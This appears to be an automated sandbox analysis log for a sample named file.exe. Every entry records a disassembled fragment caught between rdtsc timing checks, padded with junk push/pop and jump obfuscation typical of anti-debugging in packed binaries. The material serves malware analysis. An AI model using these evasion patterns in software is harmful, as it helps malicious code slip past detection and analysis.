Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D47 second address: 9C3D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F8A2C7FDC22h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jl 00007F8A2C7FDC20h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDC6F second address: 9CDCAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F8A2C4FB2A7h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F8A2C4FB298h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDD5F second address: 9CDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDD63 second address: 9CDD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDEA1 second address: 9CDEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE207 second address: 9CE20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE20B second address: 9CE20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED56 second address: 9CED63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED63 second address: 9CED6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE48 second address: 9CEE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE64 second address: 9CEE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF477 second address: 9CF47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF47B second address: 9CF485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF485 second address: 9CF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFC9A second address: 9CFC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFC9E second address: 9CFCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2242 second address: 9D2248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFCA4 second address: 9CFCAE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8A2C4FB29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2248 second address: 9D224E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8660 second address: 9D86F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8A2C4FB296h 0x00000009 jne 00007F8A2C4FB296h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F8A2C4FB298h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1E97h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F8A2C4FB298h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 jmp 00007F8A2C4FB2A5h 0x00000056 mov edi, dword ptr [ebp+122D29A8h] 0x0000005c push 00000000h 0x0000005e mov ebx, dword ptr [ebp+122D1DE5h] 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F8A2C4FB29Ch 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D86F1 second address: 9D8701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D95F1 second address: 9D95F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D95F5 second address: 9D95F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3E32 second address: 9D3E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D95F9 second address: 9D9634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e movsx edi, di 0x00000011 push 00000000h 0x00000013 add dword ptr [ebp+122D2DB3h], ecx 0x00000019 push 00000000h 0x0000001b mov ebx, dword ptr [ebp+124743A3h] 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F8A2C7FDC20h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push edi 0x0000002f pop edi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3E36 second address: 9D3E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3E4F second address: 9D3E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA52C second address: 9DA536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8A2C4FB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA69A second address: 9DA69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB5DE second address: 9DB5E8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8A2C4FB29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC46B second address: 9DC485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA69E second address: 9DA702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+1244513Fh], esi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D2197h], edx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 jc 00007F8A2C4FB29Ch 0x0000002a mov dword ptr [ebp+122D2D52h], eax 0x00000030 cmc 0x00000031 mov eax, dword ptr [ebp+122D1345h] 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F8A2C4FB298h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 adc di, 88FEh 0x00000056 push FFFFFFFFh 0x00000058 adc bx, 6CA4h 0x0000005d push eax 0x0000005e pushad 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE54E second address: 9DE553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE553 second address: 9DE559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE559 second address: 9DE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8A2C7FDC26h 0x0000000d nop 0x0000000e add dword ptr [ebp+122D2E9Bh], ecx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F8A2C7FDC18h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F8A2C7FDC18h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c xor bx, 8B31h 0x00000051 push eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jg 00007F8A2C7FDC16h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF50D second address: 9DF512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF512 second address: 9DF518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF5A6 second address: 9DF5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E25E2 second address: 9E25E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E25E6 second address: 9E2664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F8A2C4FB298h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push edi 0x00000025 jmp 00007F8A2C4FB29Fh 0x0000002a pop ebx 0x0000002b xor edi, dword ptr [ebp+12473B91h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F8A2C4FB298h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push 00000000h 0x0000004f jns 00007F8A2C4FB29Ch 0x00000055 push eax 0x00000056 pushad 0x00000057 jne 00007F8A2C4FB298h 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E17E8 second address: 9E1808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2664 second address: 9E2668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1808 second address: 9E180C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E36AC second address: 9E36B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E462E second address: 9E4633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E394F second address: 9E3954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5745 second address: 9E574F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF775 second address: 9EF779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF779 second address: 9EF79D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8A2C7FDC1Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA6D second address: 9EFA8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2C4FB2A5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA8A second address: 9EFA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA94 second address: 9EFA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA9A second address: 9EFA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA9E second address: 9EFAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F45DB second address: 9F45E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F478B second address: 9F479C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4860 second address: 9F4864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA229 second address: 9FA231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA231 second address: 9FA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8A2C7FDC20h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F8A2C7FDC16h 0x0000001a jns 00007F8A2C7FDC16h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8EA0 second address: 9F8EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F8A2C4FB2A5h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8EC3 second address: 9F8ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9452 second address: 9F945C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8A2C4FB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95B3 second address: 9F95CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F8A2C7FDC16h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95CA second address: 9F95D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F974B second address: 9F9750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9750 second address: 9F975A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8A2C4FB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F975A second address: 9F9795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jp 00007F8A2C7FDC16h 0x00000010 jmp 00007F8A2C7FDC21h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 jc 00007F8A2C7FDC22h 0x0000001f jo 00007F8A2C7FDC16h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3775E second address: A37768 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37768 second address: A3776C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E96C second address: A3E971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E971 second address: A3E976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E976 second address: A3E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F8A2C4FB296h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E984 second address: A3E998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F8A2C7FDC18h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E998 second address: A3E99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E99E second address: A3E9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F8A2C7FDC1Fh 0x00000012 jbe 00007F8A2C7FDC16h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E9D4 second address: A3E9E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Eh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ED9F second address: A3EDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8A2C7FDC20h 0x0000000e jng 00007F8A2C7FDC16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDBE second address: A3EDCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDCA second address: A3EDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDD0 second address: A3EDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDD4 second address: A3EE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8A2C7FDC1Ch 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F8A2C7FDC26h 0x00000019 jnl 00007F8A2C7FDC16h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F071 second address: A3F077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A466D4 second address: A466F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A466F1 second address: A466F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A466F7 second address: A4670E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2C7FDC1Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5138A second address: A5138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5138E second address: A51398 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A2C7FDC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53FC9 second address: A53FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53FCD second address: A53FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC24h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
